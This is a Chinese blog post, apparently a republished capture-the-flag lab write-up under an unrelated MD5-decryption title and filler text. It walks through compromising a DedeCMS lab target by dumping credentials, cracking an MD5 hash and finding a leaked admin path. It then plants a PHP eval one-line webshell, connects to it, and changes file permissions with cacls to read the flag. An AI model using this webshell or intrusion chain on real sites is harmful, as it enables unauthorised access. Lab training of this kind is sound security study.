Md5解密网站源码分享php md5解密 站长工具

大家好,感谢邀请,今天来为大家分享一下Md5解密网站源码分享php的问题,以及和站长工具的一些困惑,大家要是还不太明白的话,也没有关系,因为接下来将为大家分享,希望可以帮助到大家,解决大家的问题,下面就开始吧!

声明

仅供学习,禁止用于违法行为。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

题目地址

https://www.ichunqiu.com/experiment/detail?id=51123&source=1&otype=1

题目要求

要求获取目标网站的FLAG信息

开启环境后的页面

根据提示,我们访问http://file.ichunqiu.com/49ba59ab下载dedeCMS,下载下来是一个一键爆账号密码的软件

输入目标地址http://www.test.ichunqiu爆破

得到账号和密码MD5值

对加密MD5值进行解密

在线MD5解密:https://www.somd5.com/

得到密码:only_system

有账号密码。但是后台地址不知道,进行后台目录扫描

环境中tools里自带了很多的工具,这里找到目录扫描的工具

这里使用御剑后台扫描工具

对每个地址进行查看,发现,并没有我们想要的后台,尝试更换字典或扫描器进行扫描,发现还是没有后台地址

百度找织梦cms后台的方法

日志暴露后台地址

https://blog.csdn.net/forest_fire/article/details/50944689

发现可以从报错文件/data/mysql_error_trace.inc或/data/mysqli_error_trace.inc中,可得到泄露的后台路径,我们访问

http://www.test.ichunqiu/data/mysql_error_trace.inc发现有个目录

进行访问,发现就是后台地址

输入账号密码进行登录,成功进入后台

下一步我们需要上传webshell,获取主机权限。

百度进行查找获取webshell方法

https://www.cnblogs.com/milantgh/p/3634550.html

在后台界面,我们看到在模板–>标签源码管理处可以进行增加一个新的标签,也可以对现有的便签进行编辑

这里,我们对现有的标签进行编辑写入一句话,保存

<?php@eval($_POST[&39;]);?>

上面也有提示,文件的存放位置

访问一下,使用环境中自带的菜刀进行连接

成功获取到shell

在c盘DocumentsandSettings(文件和设置)–>Administrator–>桌面看到了flag~ichunqiu.txt文件

进行查看,发现是空的,但文件大小不为0

在cmd命令中使用type进行查看看看,发现是拒绝访问,哎,肯定是权限不够

使用whoami查看我们现在的用户权限

whoami

发现我们的全是system即为最高权限,但是却还是看不falg~ichunqiu.txt,进行百度发现可能是对文件的权限进行了设置

windows下设置文件及其文件夹权限的方法:https://www.jb51.net/article/51907.htm

使用cacls命令对falg~ichunqiu.flag文件权限进行查看,发现对system用户的权限是n即为无权限

caclsflag~ichunqiu.txt

使用cacls命令对falg~ichunqiu.flag文件权限进行修改为F

caclsflag~ichunqiu.txt/E/Psystem:F/C

成功的拿到flag

typeflag~ichunqiu.txt

结尾

和师傅们一起成长,努力学习网络安全知识。

文章来源:鹏组安全

如有侵权,请联系我们进行删除

OK,本文到此结束,希望对大家有所帮助。

Published by

风君子

独自遨游何稽首 揭天掀地慰生平